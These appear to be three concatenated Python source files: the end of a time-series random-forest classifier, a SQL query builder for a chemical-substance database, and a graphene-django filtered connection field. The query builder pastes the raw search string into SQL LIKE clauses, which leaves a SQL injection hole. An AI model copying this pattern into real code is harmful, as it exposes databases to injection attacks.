warn("Warm-start fitting without increasing n_estimators does not "
"fit new trees.")
else:
if self.warm_start and len(self.estimators_) > 0:
# We draw from the random state to get the random state we
# would have got if we hadn't used a warm_start.
random_state.randint(MAX_INT, size=len(self.estimators_))
trees = [self._make_estimator(append=False,
random_state=random_state)
for i in range(n_more_estimators)]
# Parallel loop: for standard random forests, the threading
# backend is preferred as the Cython code for fitting the trees
# is internally releasing the Python GIL making threading more
# efficient than multiprocessing in that case. However, in this case,
# for fitting pipelines in parallel, multiprocessing is more efficient.
trees = Parallel(n_jobs=self.n_jobs, verbose=self.verbose)(
delayed(_parallel_build_trees)(
t, self, X, y, sample_weight, i, len(trees),
verbose=self.verbose, class_weight=self.class_weight)
for i, t in enumerate(trees))
# Collect newly grown trees
self.estimators_.extend(trees)
if self.oob_score:
self._set_oob_score(X, y)
# Decapsulate classes_ attributes
if hasattr(self, "classes_") and self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def predict_proba(self, X):
"""Predict class probabilities for X.
The predicted class probabilities of an input sample are computed as
the mean predicted class probabilities of the trees in the forest. The
class probability of a single tree is the fraction of samples of the same
class in a leaf.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, its dtype will be converted to
``dtype=np.float32``. If a sparse matrix is provided, it will be
converted into a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
check_is_fitted(self, 'estimators_')
# Check data
if self.check_input:
X = self._validate_X_predict(X)
# Assign chunk of trees to jobs
n_jobs, _, _ = _partition_estimators(self.n_estimators, self.n_jobs)
all_proba = Parallel(n_jobs=n_jobs, verbose=self.verbose)(delayed(e.predict_proba)(X) for e in self.estimators_)
all_proba = np.sum(all_proba, axis=0) / len(self.estimators_)
if len(all_proba) == 1:
return all_proba[0]
else:
return all_proba
def _validate_X_predict(self, X):
n_features = X.shape[1] if X.ndim == 2 else 1
if self.n_features_ != n_features:
raise ValueError("Number of features of the model must "
"match the input. Model n_features is %s and "
"input n_features is %s "
% (self.n_features_, n_features))
return X
def apply(self, X):
raise NotImplementedError()
def decision_path(self, X):
raise NotImplementedError()
@property
def feature_importances_(self):
raise NotImplementedError
def _set_oob_score(self, X, y):
"""Compute out-of-bag score"""
if X.ndim == 1:
X = pd.DataFrame(X)
n_classes_ = self.n_classes_
n_samples = y.shape[0]
oob_decision_function = []
oob_score = 0.0
predictions = [np.zeros((n_samples, n_classes_[k]))
for k in range(self.n_outputs_)]
for estimator in self.estimators_:
unsampled_indices = _generate_unsampled_indices(
estimator.random_state, n_samples)
p_estimator = estimator.predict_proba(X.iloc[unsampled_indices, :])
if self.n_outputs_ == 1:
p_estimator = [p_estimator]
for k in range(self.n_outputs_):
predictions[k][unsampled_indices, :] += p_estimator[k]
for k in range(self.n_outputs_):
if (predictions[k].sum(axis=1) == 0).any():
warn("Some inputs do not have OOB scores. "
"This probably means too few trees were used "
"to compute any reliable oob estimates.")
decision = (predictions[k] /
predictions[k].sum(axis=1)[:, np.newaxis])
oob_decision_function.append(decision)
oob_score += np.mean(y[:, k] ==
np.argmax(predictions[k], axis=1), axis=0)
if self.n_outputs_ == 1:
self.oob_decision_function_ = oob_decision_function[0]
else:
self.oob_decision_function_ = oob_decision_function
self.oob_score_ = oob_score / self.n_outputs_
def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees,
verbose=0, class_weight=None):
"""Private function used to fit a single tree in parallel, adjusted for pipeline trees."""
if verbose > 1:
print("building tree %d of %d" % (tree_idx + 1, n_trees))
# name of step of final estimator in pipeline
estimator = tree.steps[-1][0]
if forest.bootstrap:
n_samples = X.shape[0]
if sample_weight is None:
curr_sample_weight = np.ones((n_samples,), dtype=np.float64)
else:
curr_sample_weight = sample_weight.copy()
indices = _generate_sample_indices(tree.random_state, n_samples)
sample_counts = np.bincount(indices, minlength=n_samples)
curr_sample_weight *= sample_counts
if class_weight == 'subsample':
with catch_warnings():
simplefilter('ignore', DeprecationWarning)
curr_sample_weight *= compute_sample_weight('auto', y, indices)
elif class_weight == 'balanced_subsample':
curr_sample_weight *= compute_sample_weight('balanced', y, indices)
fit_params = {f'{estimator}__sample_weight': curr_sample_weight,
f'{estimator}__check_input': True}
tree.fit(X, y, **fit_params)
else:
fit_params = {f'{estimator}__sample_weight': sample_weight,
f'{estimator}__check_input': True}
tree.fit(X, y, **fit_params)
return tree
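# Hedged usage sketch (illustration only): it assumes the default pipeline's
# RandomIntervalFeatureExtractor accepts the nested-DataFrame panel format
# (a single column whose cells are pd.Series), which is how early sktime
# versions represented time-series datasets; the toy data below is synthetic.
if __name__ == "__main__":
    rng = np.random.RandomState(42)
    # 20 toy series of length 50; the two classes differ only in mean level.
    series = [pd.Series(rng.randn(50) + (i % 2)) for i in range(20)]
    X_toy = pd.DataFrame({"dim_0": series})
    y_toy = np.array([i % 2 for i in range(20)])
    clf = TimeSeriesForestClassifier(n_estimators=10, random_state=1)
    clf.fit(X_toy, y_toy)
    print(clf.predict_proba(X_toy)[:3])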
|
py | 7dfd1ff6e389c8f5add8b822981770d6bac63a81 | def getQueryBySearchNameFormulaOrCas(s: str) -> str:
table_name = "v_all_properties_including_correlations s"
table_name += " INNER JOIN substance sub ON sub.cas=s.cas LEFT JOIN substance_name_aliases a on sub.substance_id=a.substance_id"
query = """SELECT DISTINCT s.formula, s.name, s.cas, s.molar_weigth,
s.tfp_k, s.tb_k, s.tc_k, s.pc_bar, s.vc_cm3_per_mol, s.zc, s.omega,
s.cp_trange, s.cp_a0, s.cp_a1, s.cp_a2, s.cp_a3, s.cp_a4, s.cpig, s.cpliq,
s.antoine_a, s.antoine_b, s.antoine_c, s.pvpmin_bar, s.tmin_k, s.pvpmax_bar, s.tmax_k
FROM {0}
WHERE s.name LIKE '%{1}%'
OR s.formula LIKE '%{1}%'
OR s.cas LIKE '%{1}%'
OR a.alias LIKE '%{1}%'
ORDER BY (s.name='{1}') DESC, length(s.name)""".format(
table_name, s
)
return query
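# Hedged usage sketch: the database filename and the existence of the
# `v_all_properties_including_correlations` view, `substance`, and
# `substance_name_aliases` tables are assumptions about the surrounding
# project; only the query builder above is taken as given.
if __name__ == "__main__":
    import sqlite3
    query = getQueryBySearchNameFormulaOrCas("methane")
    with sqlite3.connect("database.db") as conn:  # hypothetical database file
        for row in conn.execute(query):
            print(row[:3])  # formula, name, cas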
|
py | 7dfd20a12a9b0978b0a76e1f0262c94ac48cd953 | from collections import OrderedDict
from functools import partial
from graphql.error import GraphQLError
from graphene.types.argument import to_arguments
from ..fields import DjangoConnectionField
from .utils import get_filtering_args_from_filterset, get_filterset_class
class DjangoFilterConnectionField(DjangoConnectionField):
def __init__(
self,
type,
fields=None,
order_by=None,
extra_filter_meta=None,
filterset_class=None,
*args,
**kwargs
):
self._fields = fields
self._provided_filterset_class = filterset_class
self._filterset_class = None
self._extra_filter_meta = extra_filter_meta
self._base_args = None
super(DjangoFilterConnectionField, self).__init__(type, *args, **kwargs)
@property
def args(self):
return to_arguments(self._base_args or OrderedDict(), self.filtering_args)
@args.setter
def args(self, args):
self._base_args = args
@property
def filterset_class(self):
if not self._filterset_class:
fields = self._fields or self.node_type._meta.filter_fields
meta = dict(model=self.model, fields=fields)
if self._extra_filter_meta:
meta.update(self._extra_filter_meta)
self._filterset_class = get_filterset_class(
self._provided_filterset_class, **meta
)
return self._filterset_class
@property
def filtering_args(self):
return get_filtering_args_from_filterset(self.filterset_class, self.node_type)
@classmethod
def merge_querysets(cls, default_queryset, queryset):
# Both the default queryset (returned from the filterset class)
# and the resolver queryset may already have slicing applied.
# We would only be able to apply one of those limits, not both
# at the same time.
# See related PR: https://github.com/graphql-python/graphene-django/pull/126
assert not (
default_queryset.query.low_mark and queryset.query.low_mark
), "Received two sliced querysets (low mark) in the connection, please slice only in one."
assert not (
default_queryset.query.high_mark and queryset.query.high_mark
), "Received two sliced querysets (high mark) in the connection, please slice only in one."
low = default_queryset.query.low_mark or queryset.query.low_mark
high = default_queryset.query.high_mark or queryset.query.high_mark
default_queryset.query.clear_limits()
queryset = super(DjangoFilterConnectionField, cls).merge_querysets(
default_queryset, queryset
)
queryset.query.set_limits(low, high)
return queryset
@classmethod
def connection_resolver(
cls,
resolver,
connection,
default_manager,
max_limit,
enforce_first_or_last,
filterset_class,
filtering_args,
root,
info,
**args
):
filter_kwargs = {k: v for k, v in args.items() if k in filtering_args}
filterset = filterset_class(
data=filter_kwargs,
queryset=default_manager.get_queryset(),
request=info.context,
)
if not (filterset.is_bound and filterset.form.is_valid()):
exc = {
str(key): [str(e.message) for e in error_list]
for key, error_list in filterset.form.errors.as_data().items()
}
raise GraphQLError(exc)
qs = filterset.qs
return super(DjangoFilterConnectionField, cls).connection_resolver(
resolver,
connection,
qs,
max_limit,
enforce_first_or_last,
root,
info,
**args
)
def get_resolver(self, parent_resolver):
return partial(
self.connection_resolver,
parent_resolver,
self.type,
self.get_manager(),
self.max_limit,
self.enforce_first_or_last,
self.filterset_class,
self.filtering_args,
)
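# Hedged schema sketch (comments only, since it needs a configured Django project):
# `Article` and the `myapp` import path are hypothetical; the relay-node plus
# `filter_fields` pattern is the documented graphene-django way this field reads
# its filters via `node_type._meta.filter_fields`.
#
# import graphene
# from graphene_django.types import DjangoObjectType
# from myapp.models import Article  # hypothetical model
#
# class ArticleNode(DjangoObjectType):
#     class Meta:
#         model = Article
#         interfaces = (graphene.relay.Node,)
#         filter_fields = ["headline"]
#
# class Query(graphene.ObjectType):
#     all_articles = DjangoFilterConnectionField(ArticleNode)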
|